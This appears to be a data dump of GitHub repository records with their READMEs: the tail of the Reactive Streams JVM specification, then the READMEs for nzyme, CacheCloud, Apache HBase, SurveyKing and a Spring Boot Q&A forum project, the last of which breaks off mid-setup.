| [:bulb:](#2.11 ""2.11 explained"") | *The intent of this rule is to establish that it is the responsibility of the Subscriber implementation to make sure that asynchronous processing of its signals are thread safe. See [JMM definition of Happens-Before in section 17.4.5](https://docs.oracle.com/javase/specs/jls/se8/html/jls-17.html#jls-17.4.5).* |
| 12 | `Subscriber.onSubscribe` MUST be called at most once for a given `Subscriber` (based on object equality). |
| [:bulb:](#2.12 ""2.12 explained"") | *The intent of this rule is to establish that it MUST be assumed that the same Subscriber can only be subscribed at most once. Note that `object equality` is `a.equals(b)`.* |
| 13 | Calling `onSubscribe`, `onNext`, `onError` or `onComplete` MUST [return normally](#term_return_normally) except when any provided parameter is `null` in which case it MUST throw a `java.lang.NullPointerException` to the caller, for all other situations the only legal way for a `Subscriber` to signal failure is by cancelling its `Subscription`. In the case that this rule is violated, any associated `Subscription` to the `Subscriber` MUST be considered as cancelled, and the caller MUST raise this error condition in a fashion that is adequate for the runtime environment. |
| [:bulb:](#2.13 ""2.13 explained"") | *The intent of this rule is to establish the semantics for the methods of Subscriber and what the Publisher is allowed to do in the case that this rule is violated. «Raise this error condition in a fashion that is adequate for the runtime environment» could mean logging the error—or otherwise make someone or something aware of the situation—as the error cannot be signalled to the faulty Subscriber.* |
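As a counterpart, here is a hypothetical `Subscriber` sketch (again, not part of the specification) that signals demand in small batches; the class name and the batch size of 16 are illustrative only:
```java
import org.reactivestreams.Subscriber;
import org.reactivestreams.Subscription;

// Hypothetical Subscriber illustrating rule 2.1 (signal demand to receive onNext),
// rule 2.5 (cancel a second Subscription) and rule 2.13 (null arguments).
public final class PrintingSubscriber<T> implements Subscriber<T> {
    private static final long BATCH = 16;   // illustrative batch size, not mandated by the specification
    private Subscription subscription;
    private long receivedInBatch;

    @Override
    public void onSubscribe(Subscription s) {
        if (s == null) throw new NullPointerException();   // rule 2.13
        if (subscription != null) {                        // already subscribed: rule 2.5
            s.cancel();
            return;
        }
        subscription = s;
        s.request(BATCH);                                  // rule 2.1: without demand there is no onNext
    }

    @Override
    public void onNext(T element) {
        if (element == null) throw new NullPointerException(); // rule 2.13
        System.out.println(element);
        if (++receivedInBatch == BATCH) {                  // request more at the very end of processing (rule 2.1 intent)
            receivedInBatch = 0;
            subscription.request(BATCH);
        }
    }

    @Override
    public void onError(Throwable t) {
        // rule 2.4: the Subscription is considered cancelled; per rule 2.3 do not call it from here
        t.printStackTrace();
    }

    @Override
    public void onComplete() {
        // rule 2.4 applies here as well; nothing more may be requested
    }
}
```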
#### 3. Subscription ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Subscription.java))
```java
public interface Subscription {
    public void request(long n);
    public void cancel();
}
```
| ID | Rule |
| ------------------------- | ------------------------------------------------------------------------------------------------------ |
| 1 | `Subscription.request` and `Subscription.cancel` MUST only be called inside of its `Subscriber` context. |
| [:bulb:](#3.1 ""3.1 explained"") | *The intent of this rule is to establish that a Subscription represents the unique relationship between a Subscriber and a Publisher [see [2.12](#2.12)]. The Subscriber is in control over when elements are requested and when more elements are no longer needed.* |
| 2 | The `Subscription` MUST allow the `Subscriber` to call `Subscription.request` synchronously from within `onNext` or `onSubscribe`. |
| [:bulb:](#3.2 ""3.2 explained"") | *The intent of this rule is to make it clear that implementations of `request` must be reentrant, to avoid stack overflows in the case of mutual recursion between `request` and `onNext` (and eventually `onComplete` / `onError`). This implies that Publishers can be `synchronous`, i.e. signalling `onNext`´s on the thread which calls `request`.* |
| 3 | `Subscription.request` MUST place an upper bound on possible synchronous recursion between `Publisher` and `Subscriber`. |
| [:bulb:](#3.3 ""3.3 explained"") | *The intent of this rule is to complement [see [3.2](#3.2)] by placing an upper limit on the mutual recursion between `request` and `onNext` (and eventually `onComplete` / `onError`). Implementations are RECOMMENDED to limit this mutual recursion to a depth of `1` (ONE)—for the sake of conserving stack space. An example for undesirable synchronous, open recursion would be Subscriber.onNext -> Subscription.request -> Subscriber.onNext -> …, as it otherwise will result in blowing the calling thread´s stack.* |
| 4 | `Subscription.request` SHOULD respect the responsivity of its caller by returning in a timely manner. |
| [:bulb:](#3.4 ""3.4 explained"") | *The intent of this rule is to establish that `request` is intended to be a [non-obstructing](#term_non-obstructing) method, and should be as quick to execute as possible on the calling thread, so avoid heavy computations and other things that would stall the caller´s thread of execution.* |
| 5 | `Subscription.cancel` MUST respect the responsivity of its caller by returning in a timely manner, MUST be idempotent and MUST be [thread-safe](#term_thread-safe). |
| [:bulb:](#3.5 ""3.5 explained"") | *The intent of this rule is to establish that `cancel` is intended to be a [non-obstructing](#term_non-obstructing) method, and should be as quick to execute as possible on the calling thread, so avoid heavy computations and other things that would stall the caller´s thread of execution. Furthermore, it is also important that it is possible to call it multiple times without any adverse effects.* |
| 6 | After the `Subscription` is cancelled, additional `Subscription.request(long n)` MUST be [NOPs](#term_nop). |
| [:bulb:](#3.6 ""3.6 explained"") | *The intent of this rule is to establish a causal relationship between cancellation of a subscription and the subsequent non-operation of requesting more elements.* |
| 7 | After the `Subscription` is cancelled, additional `Subscription.cancel()` MUST be [NOPs](#term_nop). |
| [:bulb:](#3.7 ""3.7 explained"") | *The intent of this rule is superseded by [3.5](#3.5).* |
| 8 | While the `Subscription` is not cancelled, `Subscription.request(long n)` MUST register the given number of additional elements to be produced to the respective subscriber. |
| [:bulb:](#3.8 ""3.8 explained"") | *The intent of this rule is to make sure that `request`-ing is an additive operation, as well as ensuring that a request for elements is delivered to the Publisher.* |
| 9 | While the `Subscription` is not cancelled, `Subscription.request(long n)` MUST signal `onError` with a `java.lang.IllegalArgumentException` if the argument is <= 0. The cause message SHOULD explain that non-positive request signals are illegal. |
| [:bulb:](#3.9 ""3.9 explained"") | *The intent of this rule is to prevent faulty implementations from proceeding without any exceptions being raised. Since requests are additive, requesting a negative or 0 number of elements is most likely the result of an erroneous calculation on the behalf of the Subscriber.* |
| 10 | While the `Subscription` is not cancelled, `Subscription.request(long n)` MAY synchronously call `onNext` on this (or other) subscriber(s). |
| [:bulb:](#3.10 ""3.10 explained"") | *The intent of this rule is to establish that it is allowed to create synchronous Publishers, i.e. Publishers who execute their logic on the calling thread.* |
| 11 | While the `Subscription` is not cancelled, `Subscription.request(long n)` MAY synchronously call `onComplete` or `onError` on this (or other) subscriber(s). |
| [:bulb:](#3.11 ""3.11 explained"") | *The intent of this rule is to establish that it is allowed to create synchronous Publishers, i.e. Publishers who execute their logic on the calling thread.* |
| 12 | While the `Subscription` is not cancelled, `Subscription.cancel()` MUST request the `Publisher` to eventually stop signaling its `Subscriber`. The operation is NOT REQUIRED to affect the `Subscription` immediately. |
| [:bulb:](#3.12 ""3.12 explained"") | *The intent of this rule is to establish that the desire to cancel a Subscription is eventually respected by the Publisher, acknowledging that it may take some time before the signal is received.* |
| 13 | While the `Subscription` is not cancelled, `Subscription.cancel()` MUST request the `Publisher` to eventually drop any references to the corresponding subscriber. |
| [:bulb:](#3.13 ""3.13 explained"") | *The intent of this rule is to make sure that Subscribers can be properly garbage-collected after their subscription no longer being valid. Re-subscribing with the same Subscriber object is discouraged [see [2.12](#2.12)], but this specification does not mandate that it is disallowed since that would mean having to store previously cancelled subscriptions indefinitely.* |
| 14 | While the `Subscription` is not cancelled, calling `Subscription.cancel` MAY cause the `Publisher`, if stateful, to transition into the `shut-down` state if no other `Subscription` exists at this point [see [1.9](#1.9)]. |
| [:bulb:](#3.14 ""3.14 explained"") | *The intent of this rule is to allow for Publishers to signal `onComplete` or `onError` following `onSubscribe` for new Subscribers in response to a cancellation signal from an existing Subscriber.* |
| 15 | Calling `Subscription.cancel` MUST [return normally](#term_return_normally). |
| [:bulb:](#3.15 ""3.15 explained"") | *The intent of this rule is to disallow implementations to throw exceptions in response to `cancel` being called.* |
| 16 | Calling `Subscription.request` MUST [return normally](#term_return_normally). |
| [:bulb:](#3.16 ""3.16 explained"") | *The intent of this rule is to disallow implementations to throw exceptions in response to `request` being called.* |
| 17 | A `Subscription` MUST support an unbounded number of calls to `request` and MUST support a demand up to 2^63-1 (`java.lang.Long.MAX_VALUE`). A demand equal or greater than 2^63-1 (`java.lang.Long.MAX_VALUE`) MAY be considered by the `Publisher` as “effectively unbounded”. |
| [:bulb:](#3.17 ""3.17 explained"") | *The intent of this rule is to establish that the Subscriber can request an unbounded number of elements, in any increment above 0 [see [3.9](#3.9)], in any number of invocations of `request`. As it is not feasibly reachable with current or foreseen hardware within a reasonable amount of time (1 element per nanosecond would take 292 years) to fulfill a demand of 2^63-1, it is allowed for a Publisher to stop tracking demand beyond this point.* |
A `Subscription` is shared by exactly one `Publisher` and one `Subscriber` for the purpose of mediating the data exchange between this pair. This is the reason why the `subscribe()` method does not return the created `Subscription`, but instead returns `void`; the `Subscription` is only passed to the `Subscriber` via the `onSubscribe` callback.
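The demand bookkeeping implied by rules 3.8 and 3.17 is commonly implemented as a saturating addition, so that accumulated demand never overflows past `Long.MAX_VALUE`. A minimal, hypothetical helper (the name `addCap` is not part of the Reactive Streams API) might look like this:
```java
import java.util.concurrent.atomic.AtomicLong;

// Hypothetical helper for a Subscription implementation: adds newly requested demand to an
// AtomicLong while saturating at Long.MAX_VALUE, i.e. treating it as effectively unbounded (rule 3.17).
final class DemandSupport {
    private DemandSupport() {}

    static long addCap(AtomicLong demand, long n) {
        while (true) {
            long current = demand.get();
            if (current == Long.MAX_VALUE) return Long.MAX_VALUE; // already effectively unbounded
            long next = current + n;
            if (next < 0) next = Long.MAX_VALUE;                  // overflow: saturate instead of wrapping
            if (demand.compareAndSet(current, next)) return next; // rule 3.8: requests are additive
        }
    }
}
```
A `request(long n)` implementation would typically validate `n > 0` first (rule 3.9) and then call such a helper before draining.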
#### 4. Processor ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Processor.java))
```java
public interface Processor<T, R> extends Subscriber<T>, Publisher<R> {
}
```
| ID | Rule |
| ------------------------ | ------------------------------------------------------------------------------------------------------ |
| 1 | A `Processor` represents a processing stage—which is both a `Subscriber` and a `Publisher` and MUST obey the contracts of both. |
| [:bulb:](#4.1 ""4.1 explained"") | *The intent of this rule is to establish that Processors behave, and are bound by, both the Publisher and Subscriber specifications.* |
| 2 | A `Processor` MAY choose to recover an `onError` signal. If it chooses to do so, it MUST consider the `Subscription` cancelled, otherwise it MUST propagate the `onError` signal to its Subscribers immediately. |
| [:bulb:](#4.2 ""4.2 explained"") | *The intent of this rule is to inform that it’s possible for implementations to be more than simple transformations.* |
While not mandated, it can be a good idea to cancel a `Processor`´s upstream `Subscription` when/if its last `Subscriber` cancels their `Subscription`,
to let the cancellation signal propagate upstream.
### Asynchronous vs Synchronous Processing ###
The Reactive Streams API prescribes that all processing of elements (`onNext`) or termination signals (`onError`, `onComplete`) MUST NOT *block* the `Publisher`. However, each of the `on*` handlers can process the events synchronously or asynchronously.
Take this example:
```
nioSelectorThreadOrigin map(f) filter(p) consumeTo(toNioSelectorOutput)
```
It has an async origin and an async destination. Let’s assume that both origin and destination are selector event loops. The `Subscription.request(n)` must be chained from the destination to the origin. This is now where each implementation can choose how to do this.
The following uses the pipe `|` character to signal async boundaries (queue and schedule) and `R#` to represent resources (possibly threads).
```
nioSelectorThreadOrigin | map(f) | filter(p) | consumeTo(toNioSelectorOutput)
-------------- R1 ---- | - R2 - | -- R3 --- | ---------- R4 ----------------
```
In this example each of the 3 consumers, `map`, `filter` and `consumeTo` asynchronously schedule the work. It could be on the same event loop (trampoline), separate threads, whatever.
```
nioSelectorThreadOrigin map(f) filter(p) | consumeTo(toNioSelectorOutput)
------------------- R1 ----------------- | ---------- R2 ----------------
```
Here it is only the final step that asynchronously schedules, by adding work to the NioSelectorOutput event loop. The `map` and `filter` steps are synchronously performed on the origin thread.
Or another implementation could fuse the operations to the final consumer:
```
nioSelectorThreadOrigin | map(f) filter(p) consumeTo(toNioSelectorOutput)
--------- R1 ---------- | ------------------ R2 -------------------------
```
All of these variants are ""asynchronous streams"". They all have their place and each has different tradeoffs including performance and implementation complexity.
The Reactive Streams contract allows implementations the flexibility to manage resources and scheduling and mix asynchronous and synchronous processing within the bounds of a non-blocking, asynchronous, dynamic push-pull stream.
In order to allow fully asynchronous implementations of all participating API elements—`Publisher`/`Subscription`/`Subscriber`/`Processor`—all methods defined by these interfaces return `void`.
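As a rough illustration of such an asynchronous boundary (the `|` markers above), a stage can hand the signals it receives off to an `Executor` instead of processing them on the upstream thread. The following decorator is a hypothetical sketch, not taken from any of the pipelines above; it assumes a single-threaded `Executor` so that the serial delivery required by rule 1.3 is preserved:
```java
import org.reactivestreams.Subscriber;
import org.reactivestreams.Subscription;

import java.util.concurrent.Executor;

// Hypothetical decorator that moves signal processing onto another Executor so that slow
// downstream work does not obstruct the upstream Publisher (rule 2.2).
// A single-threaded Executor (e.g. Executors.newSingleThreadExecutor()) is assumed, which
// keeps the relayed signals serial as required by rule 1.3.
final class AsyncBoundarySubscriber<T> implements Subscriber<T> {
    private final Subscriber<T> downstream;
    private final Executor executor;

    AsyncBoundarySubscriber(Subscriber<T> downstream, Executor executor) {
        this.downstream = downstream;
        this.executor = executor;
    }

    @Override public void onSubscribe(Subscription s) { executor.execute(() -> downstream.onSubscribe(s)); }
    @Override public void onNext(T element)           { executor.execute(() -> downstream.onNext(element)); }
    @Override public void onError(Throwable t)        { executor.execute(() -> downstream.onError(t)); }
    @Override public void onComplete()                { executor.execute(() -> downstream.onComplete()); }
}
```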
### Subscriber controlled queue bounds ###
One of the underlying design principles is that all buffer sizes are to be bounded and these bounds must be *known* and *controlled* by the subscribers. These bounds are expressed in terms of *element count* (which in turn translates to the invocation count of onNext). Any implementation that aims to support infinite streams (especially high output rate streams) needs to enforce bounds all along the way to avoid out-of-memory errors and constrain resource usage in general.
Since back-pressure is mandatory the use of unbounded buffers can be avoided. In general, the only time when a queue might grow without bounds is when the publisher side maintains a higher rate than the subscriber for an extended period of time, but this scenario is handled by backpressure instead.
Queue bounds can be controlled by a subscriber signaling demand for the appropriate number of elements. At any point in time the subscriber knows:
- the total number of elements requested: `P`
- the number of elements that have been processed: `N`
Then the maximum number of elements that may arrive—until more demand is signaled to the Publisher—is `P - N`. In the case that the subscriber also knows the number of elements `B` in its input buffer then this bound can be refined to `P - B - N`.
These bounds must be respected by a publisher independent of whether the source it represents can be backpressured or not. In the case of sources whose production rate cannot be influenced—for example clock ticks or mouse movement—the publisher must choose to either buffer or drop elements to obey the imposed bounds.
Subscribers signaling a demand for one element after the reception of an element effectively implement a Stop-and-Wait protocol where the demand signal is equivalent to acknowledgement. By providing demand for multiple elements the cost of acknowledgement is amortized. It is worth noting that the subscriber is allowed to signal demand at any point in time, allowing it to avoid unnecessary delays between the publisher and the subscriber (i.e. keeping its input buffer filled without having to wait for full round-trips).
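A hypothetical sketch of this accounting: a Subscriber whose input buffer capacity is its requested bound `P`, and which re-requests in half-capacity batches as it processes elements, so that `P - B - N` (and therefore its memory use) stays bounded while the acknowledgement cost is amortized. All names are illustrative, and the capacity is assumed to be at least 2:
```java
import org.reactivestreams.Subscriber;
import org.reactivestreams.Subscription;

import java.util.ArrayDeque;
import java.util.Queue;

// Hypothetical Subscriber with a bounded input buffer. It requests `capacity` elements up front
// and re-requests in half-capacity batches as elements are processed, so the number of
// requested-but-unprocessed elements never exceeds `capacity`.
final class BufferedSubscriber<T> implements Subscriber<T> {
    private final int capacity;                     // the bound P controlled by this subscriber
    private final Queue<T> buffer = new ArrayDeque<>();
    private Subscription subscription;
    private int processedSinceLastRequest;

    BufferedSubscriber(int capacity) { this.capacity = capacity; }

    @Override public void onSubscribe(Subscription s) {
        subscription = s;
        s.request(capacity);                        // initial demand equals the buffer capacity
    }

    @Override public void onNext(T element) {
        buffer.offer(element);                      // cannot overflow: at most `capacity` elements are outstanding
        drain();
    }

    private void drain() {
        T next;
        while ((next = buffer.poll()) != null) {
            process(next);
            if (++processedSinceLastRequest == capacity / 2) {   // amortize the request round-trips
                processedSinceLastRequest = 0;
                subscription.request(capacity / 2);
            }
        }
    }

    private void process(T element) { /* application-specific processing */ }

    @Override public void onError(Throwable t) { buffer.clear(); }
    @Override public void onComplete() { buffer.clear(); }
}
```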
## Legal
This project is a collaboration between engineers from Kaazing, Lightbend, Netflix, Pivotal, Red Hat, Twitter and many others. This project is licensed under MIT No Attribution (SPDX: MIT-0).
"
nzymedefense/nzyme,master,1322,146,2016-11-11T22:06:03Z,64941,105,Network Defense System.,detection ethernet ids ndr network response security visibility wifi wireless,"# nzyme - Network Defense System
[![Codecov](https://img.shields.io/codecov/c/github/lennartkoopmann/nzyme.svg)](https://codecov.io/gh/lennartkoopmann/nzyme/)
[![License](https://img.shields.io/badge/license-SSPL-brightgreen)](http://www.mongodb.com/licensing/server-side-public-license)
Learn more at https://www.nzyme.org/.
**Version 2.0.0 of nzyme is currently in development. The previous website for v1.x is archived [here](https://v1.nzyme.org/).**
## Contributing
There are many ways to contribute and all community interaction is absolutely welcome:
* Open an issue for any kind of bug you think you have found.
* Open an issue for anything that was confusing to you. Bad, missing or confusing documentation is considered a bug.
* Open a Pull Request for a new feature or a bugfix. It is a good idea to get in contact first to make sure that it fits the roadmap and has a chance to be merged.
* Write documentation.
* Write a blog post.
* Help a user in the issue tracker or the IRC channel (#nzyme on FreeNode.)
* Get in contact and say how you use it or what would be a cool addition.
* Tell the world.
Please be aware of the [Code of Conduct](CODE_OF_CONDUCT.md) that will be enforced across all channels and platforms.
## Legal notice
Make sure to comply with local laws, especially with regard to wiretapping, when running nzyme. Note that nzyme never decrypts any data; it only reads unencrypted data.
"
sohutv/cachecloud,main,8453,2037,2016-01-26T05:46:01Z,52949,35,"搜狐视频(sohu tv)Redis私有云平台 :支持Redis多种架构(Standalone、Sentinel、Cluster)高效管理、有效降低大规模redis运维成本,提升资源管控能力和利用率。平台提供快速搭建/迁移,运维管理,弹性伸缩,统计监控,客户端整合接入等功能。(CacheCloud is a Redis cloud management platform. It supports Standalone, Sentinel, and Cluster architectures for Redis, effectively reducing large-scale Redis operation and maintenance costs, and improving resource management and utilization. The platform provides rapid construction/migration, operation and maintenance management, elastic scaling, statistical monitoring, client integration and access and other functions)",cachecloud java jedis lettuce redis redis-cache redis-client redis-cluster redis-monitor redis-sentinel,"[中文](README_CN.md) | [EN](README_EN.md)
![CacheCloud platform](cachecloud-web/src/main/resources/static/img/readme/cachecloud-head.png)
[![CI checks on main badge]][CI checks on main link] [![latest release badge]][latest release link] [![github stars badge]][github stars link] [![github forks badge]][github forks link] [![github open issues badge]][github open issues link] [![github open prs badge]][github open prs link] [![latest commit to main badge]][latest commit to main link]
[CI checks on main badge]: https://flat.badgen.net/github/checks/sohutv/cachecloud/main?label=CI%20status%20on%20main&cache=900&icon=github
[CI checks on main link]:https://github.com/sohutv/cachecloud/actions?query=branch%3Amain
[github forks badge]: https://flat.badgen.net/github/forks/sohutv/cachecloud?icon=github
[github forks link]: https://useful-forks.github.io/?repo=sohutv%2Fcachecloud
[github open issues badge]: https://flat.badgen.net/github/open-issues/sohutv/cachecloud?icon=github
[github open issues link]: https://github.com/sohutv/cachecloud/issues?q=is%3Aissue+is%3Aopen
[github open prs badge]: https://flat.badgen.net/github/open-prs/sohutv/cachecloud?icon=github
[github open prs link]: https://github.com/sohutv/cachecloud/pulls?q=is%3Apr+is%3Aopen
[github stars badge]: https://flat.badgen.net/github/stars/sohutv/cachecloud?icon=github
[github stars link]: https://github.com/sohutv/cachecloud/stargazers
[latest commit to main badge]: https://flat.badgen.net/github/last-commit/sohutv/cachecloud/main?icon=github&color=yellow&label=last%20dev%20commit&cache=900
[latest commit to main link]: https://github.com/sohutv/cachecloud/commits/main
[latest release badge]: https://flat.badgen.net/github/release/sohutv/cachecloud/development?icon=github
[latest release link]: https://github.com/sohutv/cachecloud/releases
## What is CacheCloud?
CacheCloud is a Redis cloud management platform: it supports efficient management of multiple Redis architectures (Standalone, Sentinel, Cluster), effectively reduces the operational cost of large-scale Redis deployments, and improves resource governance and utilization. The platform provides rapid setup/migration, operations management, elastic scaling, statistics and monitoring, client integration, and other functions.
## CacheCloud Feature Architecture
+ Redis setup: host environment initialization, instance deployment and installation, support for the different architecture types;
+ Operations management: host environment, resource management, application auditing, application operations, quality monitoring, diagnostics and analysis;
+ Statistics and monitoring: log collection, instance collection, machine collection, application statistics, monitoring and alerting, problem diagnosis;
+ Client access: SDK integration, language integration, client monitoring;
+ Elastic scaling: resource shrinking, application scaling, external access;
## CacheCloud Usage Scale
+ 800亿+ commands/day
+ 18T+ Memory Total
+ 420+ app Total / 4800+ Instances Total
+ 80+ Physical machine/ 360+ K8s Pod Total
## CacheCloud vs. Cloud Vendors
Redis master/replica and cluster deployment costs
## Contributors
## Thanks to Our Supporters
![Stargazers repo roster for @sohutv/cachecloud](https://bytecrank.com/nastyox/reporoster/php/stargazersSVG.php?user=sohutv&repo=cachecloud)
![Forkers repo roster for @sohutv/cachecloud](https://bytecrank.com/nastyox/reporoster/php/forkersSVG.php?user=sohutv&repo=cachecloud)
## Contact Us
+ QQ groups: 534429768 (full) / group 2: 894022242 / group 3: 908821300
+ WeChat group:
+ WeChat: if you have public network resources, please contact me; they can be added to the open-source deployment for trial use to improve everyone's experience.
If you find CacheCloud helpful, a Star ⭐ is appreciated.
"
apache/hbase,master,5114,3290,2014-05-23T07:00:07Z,482524,230,Apache HBase,database hbase java,"
![hbase-logo](https://raw.githubusercontent.com/apache/hbase/master/src/site/resources/images/hbase_logo_with_orca_large.png)
[Apache HBase](https://hbase.apache.org) is an open-source, distributed, versioned, column-oriented store modeled after Google's [Bigtable](https://research.google.com/archive/bigtable.html): A Distributed Storage System for Structured Data by Chang et al. Just as Bigtable leverages the distributed data storage provided by the Google File System, HBase provides Bigtable-like capabilities on top of [Apache Hadoop](https://hadoop.apache.org/).
# Getting Started
To get started using HBase, the full documentation for this release can be found under the doc/ directory that accompanies this README. Using a browser, open the docs/index.html to view the project home page (or browse https://hbase.apache.org). The hbase '[book](https://hbase.apache.org/book.html)' has a 'quick start' section and is where you should begin your exploration of the hbase project.
The latest HBase can be downloaded from the [download page](https://hbase.apache.org/downloads.html).
We use mailing lists to send notices and to discuss. The mailing lists and archives are listed [here](http://hbase.apache.org/mail-lists.html).
# How to Contribute
The source code can be found at https://hbase.apache.org/source-repository.html
The HBase issue tracker is at https://hbase.apache.org/issue-tracking.html
Notice that the public registration for https://issues.apache.org/ has been disabled due to spam. If you want to contribute to HBase, please visit the [Request a jira account](https://selfserve.apache.org/jira-account.html) page to submit your request. Please make sure to select **hbase** as the '_ASF project you want to file a ticket_' so we can receive your request and process it.
> **_NOTE:_** we need to process the requests manually, so it may take some time, for example up to a week, for us to respond to your request.
# About
Apache HBase is made available under the [Apache License, version 2.0](https://hbase.apache.org/license.html)
The HBase distribution includes cryptographic software. See the export control notice [here](https://hbase.apache.org/export_control.html).
"
javahuang/SurveyKing,master,2797,434,2021-09-06T13:34:14Z,76009,33,Make a better survey system.,java react-survey springboot survey surveyjs surveymonkey,"# SurveyKing (卷王)
Simplified Chinese | [English](./README.en-us.md)
## The most powerful survey and exam system
[Click here](https://wj.surveyking.cn/s/start) to get started quickly with the SurveyKing survey and exam system
Your star ⭐️⭐️⭐️ support is appreciated 🙏🙏🙏. **Click Star in the top-right corner (optional) and join the QQ group (1074277968) to get the latest database scripts.**
## Quick Start (one-click deployment)
### 🚀 Try the survey system in 1 minute (no database installation required)
1. Download the SurveyKing quick-start package (join the QQ group to get it)
2. Unzip it and double-click start.bat to run
3. Open [http://localhost:1991](http://localhost:1991) in a browser and log in with *admin*/*123456*
### One-click Docker deployment
```bash
docker run -p 1991:1991 surveyking/surveyking
```
## Features
- 🥇 Supports more than 20 question types, such as fill-in-the-blank, choice, dropdown, cascading, matrix, pagination, signature, question group, upload, [horizontal fill-in-the-blank](https://wj.surveyking.cn/s/EMqvs7), and more
- 🎉 Multiple ways to create surveys: import from Excel, import from text, or edit with the online editor
- 💪 Rich survey settings, including whitelist-only responses, public result lookup, response limits, and more
- 🎇 Data: add, edit, tag, export, print, and preview survey responses, and download attachments in bulk
- 🎨 Reports: real-time statistical analysis of questions, displayed and exported as charts (bar, column, pie) and tables
- 🚀 Simple installation and deployment (**as fast as 1 minute**), supporting one-click Windows deployment, one-click Docker deployment, separate front-end/back-end deployment, single-jar deployment, and deployment under a sub-path
- 🥊 Responsive layout; every page adapts well to both desktop and mobile (including survey editing, settings, and answering)
- 👬 Multi-user collaboration on survey management
- 🎁 The back end supports multiple databases, including any relational database with a JDBC driver
- 🐯 Secure, reliable, stable, and high-performance back-end API service
- 🙆 Complete RBAC permission control
- 🦋 Visual configuration of survey jump and display logic, plus custom logic via formulas (SurveyKing's logic settings are much more powerful than mainstream commercial survey systems)
  - **Show/hide logic**
  - **Value calculation logic**: dynamically compute answers, from a simple BMI based on height and weight to complex calculations combining the logic and values of multiple answers
  - **Text substitution logic**: dynamically display question content
  - **Value validation logic**: decide whether the current answer is valid based on the answers to other questions
  - **Required-field logic**: dynamically decide whether the current question is required
  - **Auto-select option logic**: automatically select options based on other questions and their answers
  - **Option show/hide logic**: dynamically show or hide options
  - **End-of-survey logic**
  - **Jump logic**: dynamic jumps
  - **Custom end-of-survey message logic**: after submission, show different messages based on the answers or the exam score
  - **Custom redirect link logic**: after submission, redirect to different links based on the answers or the exam score, with support for passing answers as parameters
- 🌈 Unique-option settings, cross-survey data queries, updates and deletions, automatic exam scoring, custom messages, custom redirect links, and more
| | 问卷网 | 腾讯问卷 | 问卷星 | 金数据 | SurveyKing |
| --------------- | ------ | -------- | ------ | ------ | ---- |
| Surveys | ✔️ | ✔️ | ✔️ | ✔️ | ✔️ |
| Online exams | ✔️ | ❌ | ✔️ | ✔️ | ✔️ |
| Voting | ✔️ | ✔️ | ✔️ | ✔️ | ✔️ |
| Question types | 🥇 | 🥉 | 🥇 | 🥈 | 🥈 |
| Question settings | 🥇 | 🥉 | 🥇 | 🥇 | 🥇 |
| Automatic calculation | ❌ | ❌ | 🥉 | 🥈 | 🥇 |
| Logic settings | 🥈 | 🥈 | 🥈 | 🥈 | 🥇 |
| Custom validation | ❌ | ❌ | ❌ | ❌ | ✔️ |
| Custom export | 🥈 | ❌ | ❌ | 🥉 | 🥇 |
| Mobile editing | ✔️ | ✔️ | ✔️ | ✔️ | ✔️ |
| Public query (quick lookup) | ✔️ | ❌ | ✔️ | ❌ | ✔️ |
| Private deployment | 💰💰💰 | 💰💰💰 | 💰💰💰 | 💰💰💰 | 🆓 |
Note: all of the products compared with SurveyKing above are commercial survey products, and they have much that SurveyKing can learn from. Only some of the main features are listed for reference; if you have doubts about the results, follow the corresponding product links and compare for yourself.
🥇 strong 🥈 medium 🥉 weak
## Recommended Projects
[A low-code generation tool focused on middle-platform architecture](https://gitee.com/orangeform/orange-admin)
## Preview Screenshots
* Exam system preview
* Survey preview
"
kermitt2/grobid,master,3040,421,2012-09-13T15:48:54Z,1460367,398,A machine learning software for extracting information from scholarly documents,bibliographical-references crf deep-learning fulltext hamburger-to-cow machine-learning metadata pdf rnn scientific-articles transformers,
codedrinker/community,master,2609,767,2019-04-23T15:11:24Z,4671,21,开源论坛、问答系统,现有功能提问、回复、通知、最新、最热、消除零回复功能。功能持续更新中…… 技术栈 Spring、Spring Boot、MyBatis、MySQL/H2、Bootstrap,bootstrap flyway h2-database mybatis mybatis-generator mysql spring springboot,"## 码问
## Online Demo
[https://www.mawen.co](https://www.mawen.co). For any configuration, usage, or support questions, 👉[click here](#contact-me) to contact me, and I can also add you to the group chat.
## Feature List
An open-source forum and Q&A system. Current features include login via multiple social platforms (GitHub, Gitee), asking questions, replying, notifications, latest questions, hottest topics, and clearing zero-reply questions.
## Step-by-step Video Tutorials for This Project
| Title | Link |
| --- | --- |
| Spring Boot in Action: Forum project (Season 1) | [BV1r4411r7au](https://www.bilibili.com/video/BV1r4411r7au) |
| Spring Boot in Action: Hot topics and classic interview questions, Top-N problems (Season 2) | [BV1Z4411f7RK](https://www.bilibili.com/video/BV1Z4411f7RK) |
| Spring Boot in Action: Integrating ads to monetize traffic (Season 3) | [BV1L4411y7J9](https://www.bilibili.com/video/BV1L4411y7J9) |
| Spring Boot in Action: Vue from scratch (prerequisite for front-end/back-end separation) (Season 4) | [BV1gE411R7YA](https://www.bilibili.com/video/BV1gE411R7YA) |
| Spring Boot in Action: Java design patterns in practice (Season 5) | [BV1UK4y1M7PC](https://www.bilibili.com/video/BV1UK4y1M7PC) |
| Spring Boot in Action: Quickly set up a free HTTPS service | [BV1oJ411K7VT](https://www.bilibili.com/video/BV1oJ411K7VT) |
## Running Locally
1. Install the required tools
JDK, Maven
2. Clone the code locally
```sh
git clone https://github.com/codedrinker/community.git
```
3. Run the database script to create the local database
```sh
mvn flyway:migrate
```
If you want to use a MySQL database, modify the following two configuration items before running the script
```
# src/main/resources/application.properties
spring.datasource.url=jdbc:h2:~/community
spring.datasource.username=sa
spring.datasource.password=123
```
```
# pom.xml
<url>jdbc:h2:~/community</url>
<user>sa</user>
<password>123</password>
```
4. Run the package command to generate an executable jar file
```sh
mvn package -DskipTests
```
5. Run the project
```sh
java -jar target/community-0.0.1-SNAPSHOT.jar
```
For a production deployment, you can add a configuration file (production.properties) and change the run command as follows
```sh
java -jar -Dspring.profiles.active=production target/community-0.0.1-SNAPSHOT.jar
```
6. Access the project
```
http://localhost:8887
```
## Miscellaneous
1. Database script used in the early videos, before Flyway was adopted
```sql
CREATE TABLE USER
(
ID int AUTO_INCREMENT PRIMARY KEY NOT NULL,
ACCOUNT_ID VARCHAR(100),
NAME VARCHAR(50),
TOKEN VARCHAR(36),
GMT_CREATE BIGINT,
GMT_MODIFIED BIGINT
);
```
2. Command to generate the Model and other MyBatis configuration files
```
